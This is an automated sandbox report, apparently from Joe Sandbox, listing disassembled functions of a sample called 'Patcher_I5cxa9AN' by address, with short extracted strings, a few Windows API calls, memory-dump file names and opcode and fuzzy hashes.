Download Yara Rule

Strings

w, xrefs: 6CE16470
spqv, xrefs: 6CE16495

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: spqv$w
API String ID: 0-2043734049
Opcode ID: 09f3bceef1b88f2ee6b120f4d90ffe4274c819f688372e943f4f809d9ebc5871
Instruction ID: e7183c20e330ce62ef7c7be0704d9b17cb8d2e88f699112057f4681183a0abb8
Opcode Fuzzy Hash: 09f3bceef1b88f2ee6b120f4d90ffe4274c819f688372e943f4f809d9ebc5871
Instruction Fuzzy Hash: D3A10632A0C2614BC715CE28885025BBBF1AB86328F29877DE8F99BBD5D734C915C7D1

Function 6CE1033F Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

gfff, xrefs: 6CE1050A
ur, xrefs: 6CE103FA

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: gfff$ur
API String ID: 0-3605534975
Opcode ID: 0c862a9c4d3da88ad5dd09ec0ad9594dbb647184db805ff153f404c0a2e4cd1f
Instruction ID: f8a166d8c285fb01a25f6c91d8e4ec5a56ec5a973917f445f5d7622279861dba
Opcode Fuzzy Hash: 0c862a9c4d3da88ad5dd09ec0ad9594dbb647184db805ff153f404c0a2e4cd1f
Instruction Fuzzy Hash: 4C7139716582414BD314CF29CC917ABB7E2EBC5318F19863EE46ACBBD1EB788416C780

Function 6CE14579 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

Ly}, xrefs: 6CE145EB
1S+h, xrefs: 6CE1468A

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 1S+h$Ly}
API String ID: 0-3679238603
Opcode ID: e652fcc3fe86a75576612a26a499def38f3bb261e6905a45d4b7a647d3b1af64
Instruction ID: 75b747c8cfb2fed05d719d1aa27ed5de0b1fac7a9c346564a679b8f960c65011
Opcode Fuzzy Hash: e652fcc3fe86a75576612a26a499def38f3bb261e6905a45d4b7a647d3b1af64
Instruction Fuzzy Hash: 5361F07161C7808BC314CF68D8907ABBBE2AFC6718F184A2DF0D59B791D7798805CB46

Function 6CE1F649 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

/JN, xrefs: 6CE20F1F
DB@H, xrefs: 6CE20F2A

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: /JN$DB@H
API String ID: 0-1686243971
Opcode ID: e62e45f54d1c1dab785a7b2b08b3f011dc8d116ae7cdee81362f892b2c383331
Instruction ID: 9b62679fb170f7e475c12fc50f4a257c953c348ff5daedd0a2aeb4f999d6a66a
Opcode Fuzzy Hash: e62e45f54d1c1dab785a7b2b08b3f011dc8d116ae7cdee81362f892b2c383331
Instruction Fuzzy Hash: 4F510831A493818BD724CE6888B13A7BBF1DF96318F284A2DC9E547BC1D7389545D782

Function 6CE1A5D0 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

&2, xrefs: 6CE1A641
sa, xrefs: 6CE1A639

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: &2$sa
API String ID: 0-4107202647
Opcode ID: 1a121e13bfacfef05548e08bd6d6dde6566c182ad19854b8e9771ba1a7ce5ff3
Instruction ID: 6781918ad335653639276ee7931c6829a49a6a20f09acc250123d7a59cb4ce70
Opcode Fuzzy Hash: 1a121e13bfacfef05548e08bd6d6dde6566c182ad19854b8e9771ba1a7ce5ff3
Instruction Fuzzy Hash: 4321E46565C2018BD7049F39CC2267BB7F4EF82368F191A1CE492CBB90E3788914C796

Function 6CDE27C0 Relevance: 1.9, Strings: 1, Instructions: 678COMMON

Download Yara Rule

Strings

`AO, xrefs: 6CDE2D08

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: `AO
API String ID: 0-2485448509
Opcode ID: f7f1e0fbed494c9eededcfd808db71552806049954af70215b646fba5944d781
Instruction ID: 65c8766b2430fdd0a969f47a3e2433d4d33f8c8fa7248212a92091381ebbc8d2
Opcode Fuzzy Hash: f7f1e0fbed494c9eededcfd808db71552806049954af70215b646fba5944d781
Instruction Fuzzy Hash: 6132CD76A45306CFCB04CFACC9997DDBBF2AB4A318F20851AD868EB775C6359945CB00

Function 6CDF2575 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDF2570,?,?,00000008,?,?,6CDF2173,00000000), ref: 6CDF27A2

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3aef1e83129dd35242b1b981618172409c48924acfae0381674aabe0b04ca2a6
Instruction ID: 4641e166f6e358b56acc1e2b36686db8072342397a8c783a652f2dec018829b1
Opcode Fuzzy Hash: 3aef1e83129dd35242b1b981618172409c48924acfae0381674aabe0b04ca2a6
Instruction Fuzzy Hash: 29B12731611648DFD705CF28C48AB557BE0FF45368F268698E8A9CF6B2C735E992CB40

Function 6CE1B4C0 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

5N, xrefs: 6CE1B7E4

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 5N
API String ID: 0-1921826014
Opcode ID: 91bd1fe48ab29a43cbec9efc9b78d9d89122ee0315af38343d23f7cf4871b41d
Instruction ID: da9152bab51a9d9cbf15c1ea4550e66009a52e837da6b2c951cfe620de025a48
Opcode Fuzzy Hash: 91bd1fe48ab29a43cbec9efc9b78d9d89122ee0315af38343d23f7cf4871b41d
Instruction Fuzzy Hash: 85D189B1A083408BD310DF29C895B6BBBF5FF86718F244A1CE5858B791E776D805CB52

Function 6CE35FA0 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

NP,?, xrefs: 6CE36210

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 42873e813488bb0845b286b8be6e89770c77990e39914ec0d5efcdfe7d1beac0
Instruction ID: 8d9a4bb2c0bd24db18ef5f93b263c018314407c4dd7da264ee18191a8becdb5a
Opcode Fuzzy Hash: 42873e813488bb0845b286b8be6e89770c77990e39914ec0d5efcdfe7d1beac0
Instruction Fuzzy Hash: 7FB12375A093208BD310CF25CC8166BB7BABBC531CF34A62CE96C8B791DB71A805C791

Function 6CDE7B18 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDE7B2E

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f6790d87a691dfd668ee393d3a72f9fc9418d374eb686417f5a02a891c4363ca
Instruction ID: 02fd0cd46dd84df54fd954801a668942b27c955cf1c4871c8db7c334399496f2
Opcode Fuzzy Hash: f6790d87a691dfd668ee393d3a72f9fc9418d374eb686417f5a02a891c4363ca
Instruction Fuzzy Hash: 4251BDB1A02615DBEB14DF64C5C17AEBBF4FB08328F22C46AC425EB251D374A941CB50

Function 6CE3CFC0 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

Wuv7, xrefs: 6CE3D1B5

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: Wuv7
API String ID: 0-3833346499
Opcode ID: e0568ffd1def9414dec621379e4d1470ffa52aa65a7c5a573b869b774917d0f4
Instruction ID: 65dd089db0663ed11e646210d453da074fcc98b17bf9fb3f3d98b87035ac5da7
Opcode Fuzzy Hash: e0568ffd1def9414dec621379e4d1470ffa52aa65a7c5a573b869b774917d0f4
Instruction Fuzzy Hash: ABA10776B193119BC314CF68CC8176BB7E1EB85318F29962CE8A9CB790D635ED05C782

Function 6CE12975 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

EwiE, xrefs: 6CE129DF

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: EwiE
API String ID: 0-1857645623
Opcode ID: eb3df69df86d09d10f3dbef0b8aed307c140d6c82ff019a68727dab204aa46c6
Instruction ID: 99f088345a2594777368a87e759ca8f2b7908cbaf77d915bb76797c92418d77c
Opcode Fuzzy Hash: eb3df69df86d09d10f3dbef0b8aed307c140d6c82ff019a68727dab204aa46c6
Instruction Fuzzy Hash: 87B102756083128BD310CF19C89025BB7F1FF99318F188A2DE8D59B764E7789905CB86

Function 6CE16A70 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

a, xrefs: 6CE16C30

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 41e448a6d6d6fb08d3dfa502668704f9cb77ffc4fc4fc8076e1652eb40c2e687
Instruction ID: b7607598400cebcc9fe1e34d90426be88e2f1b31bff1ed68c65fd7745395e493
Opcode Fuzzy Hash: 41e448a6d6d6fb08d3dfa502668704f9cb77ffc4fc4fc8076e1652eb40c2e687
Instruction Fuzzy Hash: 7581273765D6804BC3185A3C4C5139ABAA78BD7334F3EC32EE8B4CBBD2C55588168342

Function 6CE11FC1 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

_1v3, xrefs: 6CE12138

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: _1v3
API String ID: 0-1362554921
Opcode ID: 9ae8938a8cdface9266ea6b8c228e5b1b4617c2040abbe75408085c08ac6a0e9
Instruction ID: 90e7b67e5b6a3a8899dbc45fb5f537271717e7990fdcd10a7b275121c0173ee3
Opcode Fuzzy Hash: 9ae8938a8cdface9266ea6b8c228e5b1b4617c2040abbe75408085c08ac6a0e9
Instruction Fuzzy Hash: CA51BE7260C3418BD324CF24C8997AB77F2AF96318F588A2CD4D99B781DB749409C793

Function 6CE0FDD1 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

_1v3, xrefs: 6CE12138

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: _1v3
API String ID: 0-1362554921
Opcode ID: a6f0e059d6bda8166204609d96b75ea826604059642f37faf1e7fc1dd9c0091a
Instruction ID: c7647b1fbb9c994b8003fd67c8757a914ebc3cef798d125419abf9b804454e00
Opcode Fuzzy Hash: a6f0e059d6bda8166204609d96b75ea826604059642f37faf1e7fc1dd9c0091a
Instruction Fuzzy Hash: DF51AE7260C3818FD324CF25C8983ABB7F2AF96318F588A5CD4D59B780DB748805C792

Function 6CDE3590 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

G /t, xrefs: 6CDE3724

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: G /t
API String ID: 0-1522431024
Opcode ID: 66b542d471f28fe0183a9228a8b2d4b628751d54609d4d95004ed6fff2d67f8f
Instruction ID: b97ff9d5d9d6692e64f3511ba42bf7dbb8af1c51501ce5160d0f762cca63a21c
Opcode Fuzzy Hash: 66b542d471f28fe0183a9228a8b2d4b628751d54609d4d95004ed6fff2d67f8f
Instruction Fuzzy Hash: 9551A0BAE142059FCB08DF7CC9511FEBBB1AB4E324F248219D961E77B4C2359A058B51

Function 6CE14434 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

), xrefs: 6CE144B8

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 4cf7d5833f620861527a56d47873d3a7a2cdc50790a478e7d9c3ff2574f5a63e
Instruction ID: 16ce013a6c71094c7d0ceef455adbb0d1e7b7473401e63258c99912adf78d3c7
Opcode Fuzzy Hash: 4cf7d5833f620861527a56d47873d3a7a2cdc50790a478e7d9c3ff2574f5a63e
Instruction Fuzzy Hash: 1731077550C3819BD7198A34D8103AFBBF19BD3318F189A6ED1D2C3691E736C5068716

Function 6CE3C510 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@, xrefs: 6CE3C578

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6c396f148091cf66d3d12372f7fdbfda7f5f417f2a051450be5045630d7f5e5f
Instruction ID: 8e8add26a8272c1b75083f3528e1f357eaabab41d23b643fba48806d11dcd753
Opcode Fuzzy Hash: 6c396f148091cf66d3d12372f7fdbfda7f5f417f2a051450be5045630d7f5e5f
Instruction Fuzzy Hash: 6321D371509314ABC3149F58C88166BBBB4EFC6328F20962DE968473D0D331E808CBA6

Function 6CE1F005 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

u7, xrefs: 6CE1F064

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: u7
API String ID: 0-1853804965
Opcode ID: 1af4f403ae5c3b7eb109a870cb7570db7be06c43d6b1ef9ed4b43fd8f1685dad
Instruction ID: 86920fa09bc2c8dd269eef34373bab527392e501715b34550ba0d2f9b6f0a778
Opcode Fuzzy Hash: 1af4f403ae5c3b7eb109a870cb7570db7be06c43d6b1ef9ed4b43fd8f1685dad
Instruction Fuzzy Hash: 0421FDB414C3809EE310CF698494B5FFBF2AB92358F94591CF1E45B691D379810ACB9B

Function 6CE122B6 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

A, xrefs: 6CE122ED

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 98055918ea6964e3edea30d893f2daf08581d9db16faa49e902e5e874b3238e9
Instruction ID: 1a8ebe2389c4eef6529dcf6d0746947b6525e32cf4e11fb4ae87916598590961
Opcode Fuzzy Hash: 98055918ea6964e3edea30d893f2daf08581d9db16faa49e902e5e874b3238e9
Instruction Fuzzy Hash: 5D015AB081C3819FD3508F24949475BFBF0AB85318F441A2CE4C89B291D378C5098B4B

Function 6CDED6EB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CDED6EB

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4e39a1ff6a2e56b4493e7b3a44782068597b05d9ba3c566bd05e54fa3156e8bf
Instruction ID: dd94eecbe3cb1612000cb4a7ce24dc5f995270874f5f5440f8c954270a030915
Opcode Fuzzy Hash: 4e39a1ff6a2e56b4493e7b3a44782068597b05d9ba3c566bd05e54fa3156e8bf
Instruction Fuzzy Hash: 1FA001B4B412418BAB449E36A60920D3BB9BA576A570AC06AA515CA250EA288459AF02

Function 6CE29EB0 Relevance: 1.0, Instructions: 961COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976196d8889e128db30fd885f92fcd9255ba61dcbf4b52ad1bcba843e107f319
Instruction ID: b3bf433f16a88a7479f5ef4abb895c97298b2e6d2fb7eec198c60969f62cddec
Opcode Fuzzy Hash: 976196d8889e128db30fd885f92fcd9255ba61dcbf4b52ad1bcba843e107f319
Instruction Fuzzy Hash: DB92E1B0515B419FD3A1CF3DC846793BFE9AB5A310F14495EE0AEC7342D7B9A4008BA6

Function 6CE12EC0 Relevance: .9, Instructions: 858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1506a9262e48f25c1fdec20f6fc6e63c7ae9dd442098639158d17a60077d8e4
Instruction ID: 833b8663406836325227a78fc2bc9e2d6c7b412c34ab05c08d588f53e6bd365c
Opcode Fuzzy Hash: e1506a9262e48f25c1fdec20f6fc6e63c7ae9dd442098639158d17a60077d8e4
Instruction Fuzzy Hash: 1262E4B4A0D3409BE7108F25CC41B2BBBF2ABC631CF34462CE49597BA5D770A865CB56

Function 6CE18B90 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce755633531150b381ec4f3d29951f3968e048259af3cc1297209a6fe45e272b
Instruction ID: 5b797aa9c4bcf76250f809c38c7ede9a45454f95508d32de6db9033db0ab43d6
Opcode Fuzzy Hash: ce755633531150b381ec4f3d29951f3968e048259af3cc1297209a6fe45e272b
Instruction Fuzzy Hash: 57629E71619B808ED326CB3C8845397BFD2AB9A324F188B5DE0FA8B3D2C7756501C756

Function 6CDFFBF0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52defa49a2efe94790241eb5354884a262e4c00fdded988648661140eccd90bc
Instruction ID: ca71f189c679be07113fba7c71f12f3b0cc728287b5681e21e517807f13db990
Opcode Fuzzy Hash: 52defa49a2efe94790241eb5354884a262e4c00fdded988648661140eccd90bc
Instruction Fuzzy Hash: 7B528270A08BC49FE335CF25C484387BBF1AB82318F294A1DD5E606ED2D379A596C752

Function 6CDFC330 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc788ddf36d68b054f3fa67564ff1c63a369b15a8f73e5236a6f12afa594899
Instruction ID: 3f9b8aed07ac8ca5a6320ee3162cfa2f9d7c9b6e5a14184c39693fb8053aff67
Opcode Fuzzy Hash: ebc788ddf36d68b054f3fa67564ff1c63a369b15a8f73e5236a6f12afa594899
Instruction Fuzzy Hash: 4252F371508345CFC724DF18C0906AABBE1BFC8318F1A8A6DE8E957761D774E85ACB81

Function 6CE009C0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb2685ece56cd739938806400f976a3706609e672e51a637c330400abbf2a27
Instruction ID: 7b9446592ee10e6df2e76a35b7d160ce400b50bf75ca228ecb81af150c6c197f
Opcode Fuzzy Hash: 1eb2685ece56cd739938806400f976a3706609e672e51a637c330400abbf2a27
Instruction Fuzzy Hash: C422D232B083518BC325DE18D8806ABB3F1EFC531DF298A2DD9C59B785D734E4658B82

Function 6CE0AEA4 Relevance: .6, Instructions: 616COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae9a4efdf0ecc59773a09bb1569b8e6360600cc866893f83aa1a68f25f9e44d
Instruction ID: b493bf877882d0a3923e17c4d86e41d31cf1c8ca1f0eddca8750ba91551b1444
Opcode Fuzzy Hash: fae9a4efdf0ecc59773a09bb1569b8e6360600cc866893f83aa1a68f25f9e44d
Instruction Fuzzy Hash: 0F32D5B5A04B408FD314DF38D485356BBF1BB46318F154A2CD4EA8BB92E735E51ACB82

Function 6CDFCD30 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

